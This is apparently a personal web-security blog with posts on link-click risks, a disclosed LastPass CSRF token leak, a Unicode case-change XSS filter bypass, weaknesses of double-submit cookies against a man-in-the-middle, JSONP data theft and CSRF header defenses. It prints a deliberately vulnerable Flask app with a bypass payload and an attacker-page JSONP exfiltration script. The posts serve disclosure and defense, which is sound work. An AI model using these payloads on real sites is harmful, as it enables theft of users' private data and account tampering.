ahmsec

Remarks on cyber security & other topics

Risks of Clicking Links

We’re often advised not to click untrusted links, but less often told why. This post will outline a few things that can go wrong when you simply click a link.

In brief, clicking a link can lead to exploitation of vulnerabilities in your environment. These vulnerabilities can be in your apps, computer, local network, web browser, or even in your psyche.

Web app vulnerabilities

A link click can exploit vulnerabilities in web applications you use. The click can send a malicious payload directly to the target web app, or it can load a malicious website, which then sends the payload. A successful attack can result in theft or modification of data from the target web app.

Examples:

Local service vulnerabilities

Your computer may be running local services like web servers or custom protocol handlers. These could be installed by users or by apps. A malicious website can send requests to these services and exploit vulnerabilities in them.

Examples:

Local network access

Your home or office network is typically walled off from the outside world. However, when you click a link and load a malicious website, your browser executes the website’s JavaScript code. This code runs inside your network (since that’s where the browser is). While the code is sandboxed by your browser, it can still do things like:

  • Scan the internal network for devices and ports.
  • Exploit internal devices that have web interfaces, like IoT gadgets, printers, and routers.
  • Exploit internal web apps, which often have weaker security than internet-facing apps.

Examples:

Browser vulnerabilities

Your web browser may have vulnerabilities, even if it’s a modern and commonly-used browser. When you click a link and load a malicious website, the website can break out of the browser’s security controls. This can allow the website to execute code on your device, install malware, or access your accounts on other websites. Browser plugins may also introduce vulnerabilities.

This is perhaps the most fearsome risk in this list. Someone can gain control over your device simply by having you visit a website. Everyone uses web browsers, so anyone can be targeted. Fortunately however, browser vulnerabilities are not easy to come by, and are quickly patched after discovery.

Examples:

Privacy

Clicking a link and visiting a website may expose your personal information. This can include your IP address, geolocation, operating system, language, browser information, and more. This information can be unique to you, and may be correlated with activity on other websites.

Example:

Phishing

Clicking a link can take you to a webpage that tricks you (or “phishes” you) into entering your credentials, downloading & running malware, or compromising you in some other way. Good attacks can appear convincing and legitimate.

While phishing could require more than just clicking a link, it is perhaps the most common risk of clicking links, and is frequently the first step in a broader attack.

Examples:

Mitigations

Given all that can go wrong, what can you do about it?

It comes down to basic security hygiene. Use U2F/2FA, use a password manager, keep all software up-to-date, avoid installing unnecessary software, limit app permissions to what is necessary, log out of accounts you’re not using, and put untrusted “smart” devices on separate network segments.

To the extent practical, exercise caution with links, especially if unsolicited. Check if the domain is one you trust or expect. Ensure you’re on HTTPS. Be careful of what you enter, approve, download, or run.

Finally, security practitioners need to ensure that their systems and environments are resilient to users clicking on malicious links. It is unreasonable to expect users never to click on malicious links. Typical internet usage involves clicking many links, and good phishing scenarios are difficult to distinguish from legitimate scenarios.

CSRF Token Leak in LastPass Website Client

Here is a bug I reported to LastPass, copied below with some edits. They shipped a fix within 4 business days and paid out a $1k bounty.

One takeaway is the need for defense-in-depth. While our development standards may prohibit sensitive tokens in URLs, it can still happen due to human error. We can mitigate this by adding a strict Referrer Policy like <meta name="referrer" content="no-referrer">.

A second takeaway is the importance of secure defaults. In this scenario the top-level frame actually had an origin Referrer Policy. However, it did not prevent the vulnerability because the browser didn’t inherit the policy to child iframes. A more secure default could perhaps be for browsers to inherit Referrer Policy to child iframes if they’re on the same origin and don’t specify their own policy.

LastPass Bug Report

Summary

The website client (https://lastpass.com) leaks CSRF tokens to saved websites. This happens because the iframe containing “Launch” buttons has the CSRF token embedded in the src attribute.

1
<iframe id="newvault" style="border: 0px; width: 100%; height: 100%;" src="newvault/vault.php?noscript=1&amp;fromindex=1&amp;ac=1&amp;lpnorefresh=1&amp;fromwebsite=1&amp;newvault=1&amp;nk=1&amp;xmlerr=1&amp;token=[redacted]"></iframe>

This vulnerability affects Firefox and potentially other browsers, but does not appear to affect Chrome (not sure why, could be browser referrer policy inheritance or different app codebases).

Impact

A malicious webpage can make various state-changing requests to LastPass, and LastPass will honor them.

Affected endpoints include changing password hint and changing master password (only resulting in account lockout, not credential leak).

There are likely to be more affected endpoints.

Reproduction steps

  1. Log into the Firefox website client on https://lastpass.com.
  2. Add a new site and set the URL to https://www.example.com.
  3. Click ‘Launch’ on the new site.
  4. On the launched page, open your browser dev console and type document.referrer.
  5. Notice the LastPass CSRF token included in the referrer. This is readable by target sites.

If anything doesn’t work, be sure you set the target to an HTTPS site, used Firefox, and used the website client and not the extension.

Proof of concept

  1. Use Firefox to log into https://lastpass.com.
  2. Add a new site and set the URL to https://poc.ahmsec.io/3302aa361e2a44ca9bb82d66bfedd243/lastpass-csrf.html.
  3. Click ‘Launch’ on the newly added site.
  4. Click ‘Change my password hint’. A real exploit would do this step silently without prompt.
  5. Check your password hint and notice that it changed to “i-got-hacked”.

Potential attack scenarios

  • Victim generates & saves creds for some shady one-off online store. Online store is either compromised or malicious. When victim launches site from LastPass, the site can carry out CSRF attacks against victim’s LastPass.
  • Malicious user shares site with victim on LastPass. Victim launches site to check it out, and is attacked via CSRF.

Suggested mitigations

  1. Send CSRF tokens in request body or header instead of URL parameter.
    • URL parameters have higher risk of leakage via referrers and logs.
  2. Add a <meta name="referrer" content="no-referrer"> referrer policy to https://lastpass.com/newvault/vault.php.
    • This policy is included on the parent frame, but not in the vault.php nested iframe.
  3. On highly sensitive endpoints, require password hash in addition to CSRF token.
    • E.g. while password changes do require entering old password, the final POST request can be made without it. (See sample request.)
  4. Restrict CSRF tokens to sessions. Do not let them be reused across sessions.

XSS Filter Evasion via Case Change

This tweet describes an interesting behavior: certain non-ASCII characters map to ASCII characters when converted to upper- or lower-case. Specifically:

ı (\u0131) to upper-case --> I
ſ (\u017f) to upper-case --> S
İ (\u0130) to lower-case --> i
K (\u212a) to lower-case --> k

This can help bypass XSS filters and blacklists. For example, the filter in the app below can be bypassed by ?name=<ſcript src="/alert1.js"></script>.

vulnerable-app.py
1
2
3
4
5
6
7
8
9
10
11
12
13
from flask import Flask, request, Response
app = Flask(__name__)

@app.route("/")
def main():
    name = request.args.get('name') or 'guest'
    if '<script' in name.lower():
        return 'XSS DENIED!'
    return '<html>Welcome, ' + name.upper() + '!</html>'

@app.route("/ALERT1.JS") #normally hosted on attacker site
def alert1():
    return 'alert(1)'

As usual, the best practice for XSS prevention is character encoding. Blacklists are easily bypassed.

Here is a quick script to enumerate characters affected by this behavior. Interestingly, it appears that Python 2 and 3 treat İ (\u0130) differently.

casing-xss.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
import struct

interestingChars = [chr(i) for i in range(65,91)] + [chr(i) for i in range(97,123)]

for i in range(0x10FFFF+1):
    char = struct.pack('i', i).decode('utf-32', 'surrogatepass')

    charLower = char.lower()
    if charLower in interestingChars and char not in interestingChars:
        print('{} ({}) to lower-case --> {}'.format(char.encode('utf8'), repr(char), charLower))

    charUpper = char.upper()
    if charUpper in interestingChars and char not in interestingChars:
        print('{} ({}) to upper-case --> {}'.format(char.encode('utf8'), repr(char), charUpper))

CSRF: Double Submit Cookies Insufficient Against MitM

Suppose you’re at the latest hip coffee shop in town, enjoying their comfy chairs and high-speed wifi. You’re doing some confidential work using a relatively secure web application. The application always uses TLS, redirects HTTP requests back to HTTPS, and deploys Double Submit Cookies (with the ‘secure’ cookie flag) to protect from CSRF. Now suppose that the coffee shop staff becomes part of your threat model. Could they still launch CSRF attacks against you? After all, they can’t read TLS-encrypted traffic, so they can’t possibly steal CSRF tokens.

It turns out that actually yes, given the scenario above, a man-in-the-middle (with your pick of malicious staff, rogue access point, or ARP poisoning) can defeat the Double Submit defense. And it’s a simple attack, not one that requires you to break TLS or WPA2. Here’s how it works:

  1. Victim conducts secret business on https://secret.example.com (MitM attacker can’t read this traffic.)
  2. Victim visits a non-SSL website like http://stackoverflow.com or http://www.cnn.com (MitM can read and modify this traffic.)
  3. MitM injects <img src=”http://secret.example.com/non-existent.png”/> into the response from (2). Note that the img tag’s protocol is HTTP and not HTTPS.
  4. Victim’s browser receives the image tag, and sends a secondary non-SSL request to http://secret.example.com/non-existent.png. (CSRF cookie not sent because of secure flag.)
  5. MitM intercepts the response from http://secret.example.com, which could be a 301 redirect [1] or a 404 error, and injects a Set-Cookie header that overwrites the victim’s CSRF cookie with a known value. Details on how later.
  6. Since the attacker knows the CSRF cookie value, he or she can now trigger a request that includes the CSRF token in the body.

All of this can be automated for your exploit. A non-intuitive step in this attack scenario is perhaps #5. How could a non-SSL response possibly overwrite cookies that have the ‘secure’ flag and that were set under SSL? That unfortunately is allowed by design and is how the web works today. Here’s an article that describes the issue: http://scarybeastsecurity.blogspot.com/2008/11/cookie-forcing.html .

One way to protect against this scenario is to use HSTS. However, you have to make sure that every single subdomain has HSTS, because any child subdomain can be used to set cookies for the top-level parent domain, and those cookies will subsequently be sent with requests to every subdomain. You also have make sure you don’t have users on browsers without HSTS support, such as IE < v11.

A few takeaways:

  1. Double Submit Cookies are a common way to protect against CSRF. They’re recommended by OWASP and used by several websites and frameworks. However, if you need to protect against MitM, you should consider a different defense.
  2. Cookies should be treated as untrusted and attacker-controlled input. Be careful of mistakes like allowing user-generated session cookies and not sanitizing cookie-sourced values for XSS.

For further discussion on these topics, please see the following articles.
     - http://scarybeastsecurity.blogspot.com/2008/11/cookie-forcing.html
     - https://media.blackhat.com/eu-13/briefings/Lundeen/bh-eu-13-deputies-still-confused-lundeen-wp.pdf


[1] For a workaround to browsers’ aggressive caching of 301 redirects, see http://security.stackexchange.com/a/117138.

The Dangers of JSONP

This post is about how I learned of JSONP as an attack vector. This isn’t a new vulnerability, but it’s just nice that I discovered it on my own.

A note on Same-Origin Policy

Same-Origin Policy (SOP) prevents a webpage from reading data on a different domain. So if you open a tab with hacker.com, your browser won’t let it read data on bank.com. There are notable exceptions, like <img> and <script> tags. However, browsers strictly limit their scope. For example, a webpage can only execute a cross-domain script, not read its contents.

Some interesting behavior

Playing with traffic in Burp I observed the following behavior. Whatever you pass in the “callback” parameter is reflected in the response.

Request: GET /sensitive_resource?callback=myFunction
Response: myFunction({"key1":"data1", "key2":"data2", ...})

Request: GET /sensitive_resource?callback=AAAAAAAA
Response: AAAAAAAA({"key1":"data1", "key2":"data2", ...})

My first instinct was to test for XSS, but all output was correctly encoded. The response contained private data, but it required an authenticated session to access.

(Later on I learned that this request/response behavior is an old technique called JSONP. It was used to get around Same-Origin Policy restrictions before CORS came about.)

The exploit

What if we request that resource from a <script> tag on the attacker’s webpage? Notice that the response data is wrapped with a JavaScript function call that we control. Can we pre-define that function on the attacker’s webpage?

www.attacker.com:

1
2
3
4
5
6
7
8
9
<script>
var exfil_function = function(data) {
  parsed_data = response_specific_parsing(data);
  alert(parsed_data);
  exfil(parsed_data);
};
</script>

<script src="https://www.victim.com/sensitive_resource?callback=exfil_function"> </script>

And it works! The cross-domain script executes exfil_function({"key1":"data1", "key2":"data2", ...}), and since we control the definition of exfil_function, we can have it read the data!

Now when an authenticated victim views this malicious webpage, it does a cross-domain read of the sensitive resource and exfiltrates the private data.

Lesson: don’t use JSONP with private data

JSONP effectively disables Same-Origin Policy for a resource. So be cautious of using it with private data. Instead, use CORS, which gives you fine-grained and securely designed control over cross-origin sharing.

A slightly related vulnerability is JSON Hijacking. In conclusion, do not return sensitive data wrapped in JavaScript functions or arrays.

Custom Headers as CSRF Defense

CSRF is a prevalent and well-known vulnerability that affects web applications. The common way to protect against CSRF is to require anti-CSRF tokens on state-modifying requests. For defense in depth, you can add an extra layer of security by additionally requiring custom headers. This can mitigate scenarios where anti-CSRF tokens are somehow leaked (something I have seen happen).

Simple vs Preflighted Requests

The Mozilla article on CORS does a nice job of explaining the difference between “simple” and “preflighted” requests.

  • Simple requests are sent by traditional mechanisms on the web, such as GETs made by <img> tags or POSTs made by HTML forms. The browser will always send them cross-origin, and will always pass along session cookies. This behavior is what makes CSRF possible.

  • Preflighted requests are requests that either contain custom headers or use methods other than GET, POST, or HEAD. Browsers will refuse to send these requests cross-origin unless the server explicitly allows it. To check this permission, browsers will send a “pre-flight” OPTIONS request before sending the actual request, and the server has to reply with the appropriate CORS headers. If the server doesn’t, the actual request is never sent.

Note the difference: simple requests are always sent cross-origin, even though Same-Origin Policy blocks the responses. When preflighted, the request isn’t even sent in the first place.

Preflighted Requests and CSRF

If a resource requires a non-standard header or method, it won’t be sent cross-origin (unless the victim domain for some reason whitelists the attacker domain). Since the request is never sent, CSRF attacks are blocked.

Bypassing Custom Header Restrictions

While requiring custom headers is a useful layer of CSRF defense, it shouldn’t be the only one. Up until March 2015, Adobe Flash had a vulnerability that allowed you to send custom headers cross-origin. Here are two well-written posts describing the technique:

Conclusion

Consider requiring custom headers on your sensitive state-modifying requests. For example, you can require an X-Requested-With header on AJAX calls and refuse to honor those that don’t include it.

First Post!

I know you’ve been waiting eagerly, but it’s finally here: my own personal blog! … Just kidding, I can hear the crickets chirping. This is intended to be an informal space for me to write about topics of interest. Mostly technical posts about what I’m learning in “cyber” security (to use the current vernacular). Perhaps other topics as well. If future generations come across these posts and benefit, that will be great!